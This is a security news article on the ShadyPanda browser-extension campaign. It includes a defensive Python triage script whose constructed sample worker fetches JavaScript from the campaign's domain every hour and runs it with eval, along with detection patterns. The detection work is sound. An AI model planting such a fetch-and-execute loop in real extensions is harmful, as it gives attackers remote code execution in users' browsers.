
The threat actor known as ShadyPanda has been involved in a seven-year browser extension campaign that has resulted in over 4.3 million installs.
According to a report by Koi Security, five of these extensions started as legitimate programs and had malicious changes introduced in mid-2024, accounting for 300,000 installations. These extensions have since been removed.
“These extensions are currently performing remote code execution every hour, downloading and executing arbitrary JavaScript with full browser access,” security researcher Tuval Admoni said in a report shared with The Hacker News. “They monitor every website visit, steal encrypted browsing history, and collect complete browser fingerprints.”
To make matters worse, one of the extensions, Clean Master, was at one point picked up and verified by Google. This trust-building allowed the attackers to expand their user base and, years later, silently push malicious updates without arousing any suspicion.
Meanwhile, another set of five add-ons from the same publisher is designed to monitor every URL a user visits, record search engine queries and mouse clicks, and send that information to a server located in China. These extensions have been installed approximately 4 million times, with WeTab alone accounting for 3 million installs.

Early signs of malicious activity were said to have been observed in 2023, when 20 extensions were published on the Chrome Web Store and 125 extensions on Microsoft Edge by developers named “nuggetsno15” and “rocket Zhang,” respectively. All identified extensions were masquerading as wallpapers or productivity apps.
These extensions were found to engage in affiliate fraud by secretly injecting tracking codes when users visited eBay, Booking.com, or Amazon, generating illicit commissions on users' purchases. In early 2024, the activity moved from seemingly benign injections to active browser control: redirecting search queries, harvesting them, and extracting cookies from specific domains.

“All web searches were redirected through trovi.com, a known browser hijacker,” Koi said. “Search queries are recorded, monetized, and sold. Search results are manipulated for profit.”
At some point in mid-2024, five extensions (three of which had operated legitimately for years) were modified to distribute malicious updates that introduced backdoor-like functionality, checking the domain “api.extensionplay[.]com” every hour to retrieve and execute a JavaScript payload.
The payload is designed to monitor all website visits and send the data, in encrypted form, to ShadyPanda servers (“api.cleanmasters”). In addition to using extensive obfuscation to hide its functionality, it also switches to benign behavior when the browser's developer tools are opened.
Additionally, the extensions can carry out adversary-in-the-middle (AitM) attacks to facilitate credential theft, session hijacking, and arbitrary code injection into websites.
This activity moved into its final phase when five other extensions, including WeTab, published to the Microsoft Edge Add-ons store around 2023, leveraged their huge installed base to enable comprehensive monitoring of all visited URLs, search queries, mouse clicks, cookies, browser fingerprints, and more.
They also collect information about how victims interact with web pages, such as page viewing time and scrolling behavior. The WeTab extension was still available for download at the time of writing.
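The hourly fetch-and-execute loop described above is something a defender can triage for statically. The script below is example code added for this page (it is not from Koi's report or from the extensions themselves): it walks an unpacked extension directory and flags all-URL host access, references to the domains named in the article, a network fetch combined with dynamic code execution, and an hourly `chrome.alarms` beacon. The sample extension it checks is constructed, and the heuristics are illustrative assumptions rather than a published signature.

```python
import json
import re
from pathlib import Path
from tempfile import TemporaryDirectory

# Indicators named in the article (defanging brackets stripped for matching).
KNOWN_DOMAINS = [d.replace("[.]", ".") for d in ("api.extensionplay[.]com", "trovi.com")]
# Heuristics for "poll a server and execute whatever JavaScript comes back".
REMOTE_FETCH = re.compile(r"\b(fetch|XMLHttpRequest)\b")
DYNAMIC_EXEC = re.compile(r"\b(eval|new\s+Function)\b|setTimeout\s*\(\s*['\"]")
PERIODIC_ALARM = re.compile(r"chrome\.alarms\.create\([^)]*periodInMinutes\s*:\s*(\d+)")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def triage_extension(ext_dir):
    """Static triage of one unpacked extension; returns a list of finding strings."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text())
    findings = []
    # Broad host access is what lets a fetched payload observe every site visited.
    perms = manifest.get("host_permissions", []) + manifest.get("permissions", [])
    if BROAD_HOSTS & set(perms):
        findings.append("manifest: all-URL host access")
    for js in sorted(ext_dir.rglob("*.js")):
        src = js.read_text(errors="ignore")
        findings += [f"{js.name}: references {d}" for d in KNOWN_DOMAINS if d in src]
        if REMOTE_FETCH.search(src) and DYNAMIC_EXEC.search(src):
            findings.append(f"{js.name}: remote fetch combined with dynamic code execution")
        m = PERIODIC_ALARM.search(src)
        if m and int(m.group(1)) <= 60:  # hourly or more frequent beaconing
            findings.append(f"{js.name}: periodic alarm every {m.group(1)} min")
    return findings

# Constructed sample (not real ShadyPanda code): a worker shaped like the reported behaviour.
SAMPLE_MANIFEST = {"manifest_version": 3, "name": "Wallpaper Demo",
                   "permissions": ["alarms"], "host_permissions": ["<all_urls>"]}
SAMPLE_WORKER = """chrome.alarms.create('tick', {periodInMinutes: 60});
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch('https://api.extensionplay.com/cfg');
  eval(await r.text());
});
"""

def write_sample(root):
    Path(root, "manifest.json").write_text(json.dumps(SAMPLE_MANIFEST))
    Path(root, "background.js").write_text(SAMPLE_WORKER)
    return root

def triage_sample():
    with TemporaryDirectory() as tmp:
        return triage_extension(write_sample(tmp))
```

Run `triage_sample()` to see the four findings the constructed sample produces; point `triage_extension()` at a real unpacked extension directory to triage it the same way.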

The findings provide a complete picture of an ongoing campaign that occurred over four distinct phases, gradually transforming browser extensions from legitimate tools to data-gathering spyware. However, it is worth noting that it is not clear whether the attackers artificially inflated the download numbers to create an illusion of legitimacy.
We recommend that users who have installed any of these extensions remove them immediately and rotate their credentials out of an abundance of caution.
“The automatic update mechanism designed to keep users safe became an attack vector,” Koi said. “Chrome and Edge’s trusted update pipeline delivered malware to users silently. No phishing, no social engineering, just trusted extensions with silent version bumps that turn a productivity tool into a monitoring platform.”
“ShadyPanda’s success goes beyond technical sophistication; it has systematically exploited the same vulnerability for seven years. The marketplace reviews extensions at the time of submission; we do not monitor what happens after approval.”
